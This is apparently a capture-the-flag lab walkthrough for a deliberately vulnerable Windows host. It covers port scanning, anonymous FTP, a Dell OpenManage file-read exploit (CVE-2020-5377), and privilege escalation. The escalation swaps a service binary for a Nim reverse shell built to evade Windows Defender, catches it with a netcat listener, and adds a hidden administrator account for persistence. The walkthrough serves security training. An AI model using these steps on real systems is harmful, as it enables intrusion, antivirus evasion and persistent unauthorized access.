┌──(kali㉿kali)-[~]
└─$ nmap -p- hacksmarter.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 01:56 EDT
Nmap scan report for hacksmarter.thm (10.10.72.186)
Host is up (0.18s latency).
Not shown: 65530 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
1311/tcp open rxmon
3389/tcp open ms-wbt-server
Nmap done: 1 IP address (1 host up) scanned in 323.05 seconds
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 21,22,80,1311,3389 -T4 hacksmarter.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-27 02:04 EDT
Nmap scan report for hacksmarter.thm (10.10.72.186)
Host is up (0.17s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-syst:
|_ SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 06-28-23 02:58PM 3722 Credit-Cards-We-Pwned.txt
|_06-28-23 03:00PM 1022126 stolen-passport.png
22/tcp open ssh OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 0d:fa:da:de:c9:dd:99:8d:2e:8e:eb:3b:93:ff:e2:6c (RSA)
| 256 5d:0c:df:32:26:d3:71:a2:8e:6e:9a:1c:43:fc:1a:03 (ECDSA)
|_ 256 c4:25:e7:09:d6:c9:d9:86:5f:6e:8a:8b:ec:13:4a:8b (ED25519)
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: HackSmarterSec
|_http-server-header: Microsoft-IIS/10.0
1311/tcp open ssl/rxmon?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200
| Strict-Transport-Security: max-age=0
| X-Frame-Options: SAMEORIGIN
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| vary: accept-encoding
| Content-Type: text/html;charset=UTF-8
| Date: Wed, 27 Mar 2024 06:04:23 GMT
| Connection: close
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
| <html>
| <head>
| <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <title>OpenManage™</title>
| <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
| <style type="text/css"></style>
| <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
| HTTPOptions:
| HTTP/1.1 200
| Strict-Transport-Security: max-age=0
| X-Frame-Options: SAMEORIGIN
| X-Content-Type-Options: nosniff
| X-XSS-Protection: 1; mode=block
| vary: accept-encoding
| Content-Type: text/html;charset=UTF-8
| Date: Wed, 27 Mar 2024 06:04:29 GMT
| Connection: close
| <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
| <html>
| <head>
| <META http-equiv="Content-Type" content="text/html; charset=UTF-8">
| <title>OpenManage™</title>
| <link type="text/css" rel="stylesheet" href="/oma/css/loginmaster.css">
| <style type="text/css"></style>
|_ <script type="text/javascript" src="/oma/js/prototype.js" language="javascript"></script><script type="text/javascript" src="/oma/js/gnavbar.js" language="javascript"></script><script type="text/javascript" src="/oma/js/Clarity.js" language="javascript"></script><script language="javascript">
| ssl-cert: Subject: commonName=hacksmartersec/organizationName=Dell Inc/stateOrProvinceName=TX/countryName=US
| Not valid before: 2023-06-30T19:03:17
|_Not valid after: 2025-06-29T19:03:17
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-03-27T06:04:55+00:00; -1s from scanner time.
| rdp-ntlm-info:
| Target_Name: HACKSMARTERSEC
| NetBIOS_Domain_Name: HACKSMARTERSEC
| NetBIOS_Computer_Name: HACKSMARTERSEC
| DNS_Domain_Name: hacksmartersec
| DNS_Computer_Name: hacksmartersec
| Product_Version: 10.0.17763
|_ System_Time: 2024-03-27T06:04:50+00:00
| ssl-cert: Subject: commonName=hacksmartersec
| Not valid before: 2024-03-26T04:59:47
|_Not valid after: 2024-09-25T04:59:47
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port1311-TCP:V=7.94SVN%T=SSL%I=7%D=3/27%Time=6603B6E8%P=x86_64-pc-linux
...
SF:"></script><script\x20language=\"javascript\">\r\n\x20");
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 49.52 seconds
We can see anonymous login via FTP is possible. Let's do that.
┌──(kali㉿kali)-[~]
└─$ ftp 10.10.72.186
Connected to 10.10.72.186.
220 Microsoft FTP Service
Name (10.10.72.186:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||49735|)
150 Opening ASCII mode data connection.
06-28-23 02:58PM 3722 Credit-Cards-We-Pwned.txt
06-28-23 03:00PM 1022126 stolen-passport.png
226 Transfer complete.
ftp> wget Credit-Cards-We-Pwned.txt
?Invalid command.
ftp> get Credit-Cards-We-Pwned.txt
local: Credit-Cards-We-Pwned.txt remote: Credit-Cards-We-Pwned.txt
229 Entering Extended Passive Mode (|||49737|)
125 Data connection already open; Transfer starting.
100% |********************************| 3722 25.81 KiB/s 00:00 ETA
226 Transfer complete.
3722 bytes received in 00:00 (23.95 KiB/s)
ftp> binary
200 Type set to I.
ftp> get stolen-passport.png
local: stolen-passport.png remote: stolen-passport.png
229 Entering Extended Passive Mode (|||49751|)
125 Data connection already open; Transfer starting.
100% |*********************************| 998 KiB 179.06 KiB/s 00:00 ETA
226 Transfer complete.
1022126 bytes received in 00:05 (170.36 KiB/s)
ftp> exit
To download the .PNG we have to switch to binary mode.
Credit-Cards-We-Pwned.txt shows a list of credt card details.
Gobuster revealed a directory called images but we can't access it.
We continue with the web service on port 1311. Unfortunately, the Gobuster scan on this endpoint did not reveal anything. When visiting the page we get the hint that TSL is required.
We switch to https://hacksmartersec:1311/, and we get redirected to https://hacksmaertersec:1311/OMSALogin?msgStatus=null. We are dealing with DELL EMC OPENMANAGE and have a login page, but let's take a look around first.
The about page reveals more details including the version running. 9.4.0.2
Initial Access
As already mentioned, we have it to deal with DELL EMC OPENMANAGE in version 9.4.0.2. CVE-2020-5377 is known for this version, which is explained in detail in the following articles.
The blog discusses vulnerabilities found in Dell OpenManage Server Administrator (OMSA) during an internal penetration test, including CVE-2020-5377 and CVE-2021-21514. It details an authentication bypass and file read vulnerability in OMSA versions 9.4.0.0 and 9.4.0.2. The authentication bypass was deemed intended functionality.
The file read vulnerability allows arbitrary file access. A security filter meant to address this was bypassed. A proof of concept for exploiting these vulnerabilities was provided.
The blog concludes with recommendations to secure OMSA usage. PoCs can also be found via Searchsploit / exploit-db.com. However, these do not work in this case, because that version does not include the security filter bypass of CVE-2021-21514.
The article links to the PoC of the company, which is also referenced at exploit-db. We will use this to retrieve data from the system:
We have file read permissions.
┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec]
└─$ python3 CVE-2020-5377.py 10.17.15.155 10.10.72.186:1311
Session: B5B7564089D15D80F946B47850C18DA4
VID: CD41F7522B9B6D42
file > /windows/system32/drivers/etc/hosts
Reading contents of /windows/system32/drivers/etc/hosts:
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
file >
We have a username and password.
We can SSH using the above credentials.
This gives us the first flag.
Privilege Escalation
The system is protected by Windows Defender, attempts with WinPEAS were recognized and removed from the system. But the script PrivescCheck, which does something similar to WinPEAS, was not recognized.
curl http://10.17.15.155/Pcheck.ps1 -o p.ps1
. .\p.ps1; Invoke-PrivescCheck -Extended
We find a vulnerability, rated as high. The spoofer-scheduler service can be started and stopped by a normal user. The service runs under the LocalSystem. We should be able to replace the executable of the service, e.g. with a reverse shell or an executable that creates an admin account for us, we can escalate our privileges.
We confirm that we can write to C:\Program Files(x86)\Spoofer. We need a reverse shell executable that is not recognized by Windows Defender. Msfvenom payload gets easily detected and deleted.
We need a reverse shell executable that will not be detected by Windows Defender. A reverse shell written in Nim can be used for this.
To install Nim and mingw-w64 run the following:
sudo apt install mingw-w64
sudo apt install nim
After we make the necessary changes to host and port we need to compile it.
┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec]
└─$ nim c -d:mingw --app:gui --opt:speed -o:spoofer-scheduler.exe rev_shell.nim
Once compiled we can start a python server and transfer the file. We first make a backup just to be safe
Next, we stop the service, replace the spoofer-scheduler.exe with ours.
The shell you get is very unstable and will frequently time out as shown below. We can either set up persistence or be very quick and obtain what's needed.
Our reverse shell connects, we are the NT/ Authority System user and have access to C:\Users\Administrator. As the challenge says, the next targets of the threat actor are on the administrator's desktop:
Once you gain access to their server, navigate through their intricate network infrastructure, bypassing firewalls, encryption protocols, and other security layers. Locate the central repository where they store sensitive information, including their upcoming target list. Intel has reported this is located on the desktop of the Administrator user.
Let's set up persistence so we can log back in easily even if we loose our reverse shell
┌──(kali㉿kali)-[~/Desktop/THM/HackSmarterSec]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.17.15.155] from (UNKNOWN) [10.10.72.186] 50110
C:\Windows\system32> net user bun Hacksmarter123 /add
The command completed successfully.
C:\Windows\system32> net localgroup administrators bun /add
The command completed successfully.
We can now SSH with the above credentials and find the targets for the last task of the challenge.
